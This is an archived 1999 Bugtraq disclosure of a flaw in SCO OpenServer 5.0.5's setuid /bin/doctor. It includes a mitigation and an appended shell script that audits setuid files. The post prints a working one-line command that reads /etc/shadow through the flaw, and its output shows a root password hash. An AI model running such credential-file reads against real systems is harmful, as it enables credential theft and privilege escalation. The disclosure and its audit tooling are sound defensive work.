Bugtraq mailing list archives

SCO OpenServer 5.0.5 /bin/doctor root compromise


From: btellier () WEBLEY COM (Brock Tellier)
Date: Tue, 7 Sep 1999 10:44:42 -0500


Greetings,

INFO:
 There is a local root compromise in SCO 5.0.5's /bin/doctor 2.0.0e2 and probably others.  By supplying a doctor script file you can read the first partial line of any file on the system (good enough for /etc/shadow).  Example:

scobox:/bin$ id
uid=136(btellier),200(users)
scobox:/bin$ uname -a
SCO_SV scobox 3.2 5.0.5 i386
scobox:/bin$ doctor -V
doctor 2.0.0e 2
scobox:/bin$ doctor -s /etc/shadow
doctor: WARNING User message: invalid command name "root:xbfOLR0ekXN/o:10656::"
scobox:/bin$

And so on.

FIX: 
 Just chmod -s until SCO comes out with a fix.  Although I certainly won't be changing it back to suid root anytime soon.  If a hole like this exists, there are undoubtedly countless more lurking within.

Brock Tellier
Systems Administrator
Webley Systems
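
The mitigation in the FIX paragraph, generalised as an added example (not part of the original post and not SCO's code): a POSIX sh helper that lists setuid/setgid files under a directory, reports any that are not named in an allowlist, and strips the bits from a file on request. The function names and the allowlist format (one absolute path per line) are assumptions of this example.

```shell
#!/bin/sh
# Added example: audit set-id files against an allowlist.
# Function names and the allowlist format are assumptions of this example.

# list_setid DIR
# Print every regular file under DIR that has the setuid or setgid bit set.
list_setid() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null | sort
}

# audit_setid DIR ALLOWLIST
# Print set-id files under DIR that are not listed in ALLOWLIST
# (one absolute path per line). Returns 0 if none are found, 1 otherwise.
audit_setid() {
    # -x whole-line match, -F fixed strings, -v keep only unlisted paths.
    # grep exits 1 when nothing is left, which is the clean case here.
    unexpected=$(list_setid "$1" | grep -v -x -F -f "$2" || true)
    if [ -z "$unexpected" ]; then
        return 0
    fi
    printf '%s\n' "$unexpected"
    return 1
}

# strip_setid FILE
# Remove the setuid and setgid bits, leaving the other permissions as they are.
strip_setid() {
    chmod u-s,g-s "$1"
}

# Stand-alone use: script.sh DIR ALLOWLIST
if [ "$#" -eq 2 ]; then
    audit_setid "$1" "$2"
fi
```
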

This archive was generated by hypermail 2.0b3 on Thu Sep 09 1999 - 23:40:11 CDT